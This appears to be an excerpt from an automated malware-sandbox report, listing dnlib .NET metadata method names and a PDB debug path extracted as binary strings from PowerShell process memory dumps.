Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
